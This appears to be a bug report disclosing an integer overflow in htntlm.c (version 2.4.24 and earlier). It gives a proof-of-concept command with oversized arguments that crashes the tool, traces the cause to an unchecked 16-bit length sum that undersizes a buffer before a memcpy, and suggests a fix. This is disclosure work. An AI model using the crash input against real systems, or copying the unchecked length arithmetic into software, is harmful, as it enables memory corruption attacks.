#7 Integer Overflow in /src/htntlm.c (version<=2.4.24)

[Kirin]

An Integer Overflow was found in /src/htntlm.c (version<=2.4.24), which will lead to a buffer-over-write.

POC

./htntlm -w -t 2 -T `python -c "print 'a'*0x8000"` -D `python -c "print 'a'*0x4000"`

Output:

Segmentation Fault

Analyze

The program crash at function write_type2_msg:

    len16 = handle_unicode(hook, &tmp, hook->target);
    *((uint16_t *)&msg[12]) = ntlm_hton16(len16);
    *((uint16_t *)&msg[14]) = ntlm_hton16(len16);
    *((uint32_t *)&msg[16]) = ntlm_hton32(48 + offset);
    memcpy(&msg[48 + offset], tmp, len16);

msg is apr_pcalloc at:

  if (tlen16) {
    /* target info termination */
    tlen16 += 4;
  }

  len += tlen16;

  /* allocate message initialize with zeros*/
  msg = apr_pcalloc(hook->pool, len);

and uint16_t tlen16 is calc by:

  if (hook->target) {
    tlen16 += handle_unicode(hook, NULL, hook->target);
  }
  if (hook->domain) {
    tlen16 += 4 + to_unicode(hook->pool, NULL, hook->domain);
  }
  if (hook->server) {
    tlen16 += 4 + to_unicode(hook->pool, NULL, hook->server);
  }
  if (hook->dns_domain) {
    tlen16 += 4 + to_unicode(hook->pool, NULL, hook->dns_domain);
  }
  if (hook->dns_server) {
    tlen16 += 4 + strlen(hook->dns_server);
    tlen16 += 4 + to_unicode(hook->pool, NULL, hook->dns_server);
  }
  if (tlen16) {
    /* target info termination */
    tlen16 += 4;
  }

There is no code to check the length of these strings.
And it will lead to An Integer Overflow in tlen16, which finally lead to an buffer-over-write at memcpy.

Suggestion:

check the length of strings or use safer 'size_t' at tlen16.